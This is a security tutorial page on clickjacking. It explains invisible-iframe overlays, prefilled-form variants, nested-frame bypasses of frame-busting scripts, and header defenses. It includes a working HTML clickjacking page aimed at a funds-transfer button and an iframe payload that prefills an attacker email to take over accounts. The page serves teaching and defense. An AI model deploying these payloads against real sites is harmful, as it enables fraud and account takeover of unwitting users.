Clickjacking

An Overview of Clickjacking

Clickjacking tricks users into clicking hidden elements on legitimate sites by overlaying invisible iframes. Attackers exploit this to perform unintended actions like liking posts or authorizing transactions without awareness.

Core Concept

Clickjacking, also called UI redressing, uses transparent or opaque layers to hijack mouse clicks intended for a decoy page onto actionable content from another site. An attacker embeds the target site in an iframe, positions sensitive buttons under bait like "Free iPod," and makes the iframe invisible via CSS opacity or z-index manipulation.

Constructing a Basic Clickjacking Exploit

Basic clickjacking exploits use iframes to overlay invisible target site elements under enticing bait, hijacking clicks to trigger unintended actions. Attackers position buttons precisely with CSS and hide the iframe via opacity or z-index.

Core Attack Structure

The malicious page embeds the vulnerable site in an iframe, makes it transparent, and aligns a fake button over a sensitive target button like "Delete Account." Victims click the visible bait, but the browser registers it on the hidden element, executing the action with their session.

Basic HTML Example

This payload targets a site's "Transfer Funds" button, overlaying a "Free Gift" lure. 

<!DOCTYPE html>
<html>
<head>
<style>
  iframe {
    position: absolute;
    top: 0;
    left: 0;
    opacity: 0.5;  /* Set to 0 in production */
    width: 800px;
    height: 600px;
    z-index: 1;
  }
  #bait {
    position: absolute;
    top: 200px;  /* Align over target button */
    left: 100px;
    z-index: 2;
  }
</style>
</head>
<body>
  <h1>Click for FREE GIFT!</h1>
  <iframe src="https://vulnerable-site.com/transfer?amount=1000&to=attacker"></iframe>
  <button id="bait">Claim Gift Now!</button>
</body>
</html>

Adjust positioning via trial-and-error to match the target's button coordinates.

Delivery Methods

Host on phishing sites, social media, or ads; variants use multiple iframes for multi-click sequences like OAuth approvals. Frame-busting bypasses include onbeforeunload dialogs or parameter injection to disable scripts.

Clickjacking Attacks Enabled by Injected Form Values

Clickjacking with injected form values exploits sites that prepopulate form fields via GET parameters, allowing attackers to craft iframes with malicious prefilled data. Victims click overlaid bait, submitting forms with attacker-controlled values using their authenticated session.

Prefilled Form Technique

Sites that read URL parameters (e.g., ?email=attacker@evil.com) to auto-fill inputs enable this variant, as attackers embed the manipulated URL in the iframe src. The transparent iframe loads with fields pre-populated, and a positioned decoy button aligns over "Submit," tricking users into confirmation.

Attack Execution

JavaScript on the target may pull GET params into form values, bypassing manual entry requirements. Positioning uses CSS top/left offsets calibrated via trial-and-error (e.g., top:400px, left:80px) with low iframe opacity (0.0001) for invisibility. This changes emails, passwords, or transfers without alerting the user.

Example Payload Structure

<iframe src="https://target.com/account?email=hacker@evil.com"></iframe>
Overlay with <div style="position:absolute; top:400px; left:80px; z-index:2;">Click to Win!</div> and iframe at opacity:0.0001; z-index:1.

Delivery via phishing lures users to the page while logged in.

Impact Amplification

Combines with CSRF-like actions but leverages UI deception; admin victims enable account takeovers or permission grants. Unlike basic clickjacking, prefill bypasses empty-field validations, increasing success rates.

Script‑Based Clickjacking Defenses

Script-based clickjacking defenses, known as frame-busting scripts, use JavaScript to detect framing and break out by redirecting the top window or altering the DOM. These client-side measures complement headers like X-Frame-Options but face bypass risks from attackers.

Basic Frame Detection

Scripts check if window.self !== window.top, indicating an iframe, then redirect top.location.href = window.self.location.href to escape. Continuous polling via setInterval re-checks for dynamic iframe insertion. 

if (top !== self) {
    top.location = self.location;
}

Enhanced Legacy Protection

OWASP recommends comprehensive scripts handling sandboxed iframes, descendant policies, and event suppression by setting top.document.body.innerHTML = '' or using window.onbeforeunload. These loop through frames and enforce visibility: 

(function() {
    if (top !== self) {
        top.location = self.location;
    }
})();

Limitations and Bypasses

Attackers disable via XSS filters matching script patterns, sandbox attributes blocking navigation, or allowtopnavigationbyuseractivation in iframes. JavaScript-disabled zones or NoScript extensions also neutralize them, making headers preferable.

Layered Clickjacking Exploits

Layered clickjacking exploits stack multiple iframes or overlays to bypass defenses, chain actions, or handle multi-step interactions. These advanced variants defeat frame-busters, X-Frame-Options inconsistencies, or single-click limitations using precise positioning and timing.

Double/Triple Framing

Attackers nest iframes (e.g., attacker page → intermediate frame → target), blocking parent.location access due to same-origin violations. Outer frames use sandbox without allow-top-navigation to trap busting scripts, while inner layers capture clicks.

Multi-Step Sequencing

Hover detection over transparent divs (with pointer-events: auto) triggers timers, advancing through click chains like login → OAuth → self-XSS without click events. Redirect loopholes load unprotected internal pages in iframes, then bounce to login (checked only on initial URL).

Combined Attack Chains

Layer DOM XSS in iframes: click triggers payload execution on victim's session. Double clickjacking requires two precise clicks via stacked overlays, evading SameSite or single-interaction filters.

Bypass Techniques

URL parameter injection disables frame-busters: ?param=if(top!=self){...}
pointer-events: none on iframes passes clicks through layers
Z-index stacking with opacity gradients hides multi-frame complexity

Defenses Against Clickjacking Attacks

Defenses against clickjacking primarily use HTTP headers to control iframe embedding, with layered approaches for compatibility and robustness. X-Frame-Options provides legacy protection while CSP frame-ancestors offers modern flexibility.

X-Frame-Options Header

Set X-Frame-Options: DENY to block all framing, or SAMEORIGIN to allow only same-origin iframes. Deprecated but widely supported, it indicates if pages can render in frames, iframes, or objects; proxies may strip it, reducing reliability.

CSP frame-ancestors Directive

Content-Security-Policy: frame-ancestors 'none'; denies all embedding, 'self' permits same-origin, or list domains like 'self' https://trusted.com. Supersedes X-Frame-Options (takes precedence in modern browsers) and supports multiple origins/wildcards.

Complementary Measures

Frame-busting JavaScript detects window.self !== window.top and redirects, but bypassable via sandbox or XSS. Combine headers (CSP overrides XFO) and test regularly; avoid sole reliance on deprecated ALLOW-FROM.

INFOSEC

Secure your web applications from end to end. Explore both server-side and client-side security strategies to protect your systems and users.

Quick Links

About Us Feature Blog

Support

Privacy Policy Terms & Conditions FAQ
INFOSEC, All right reserved.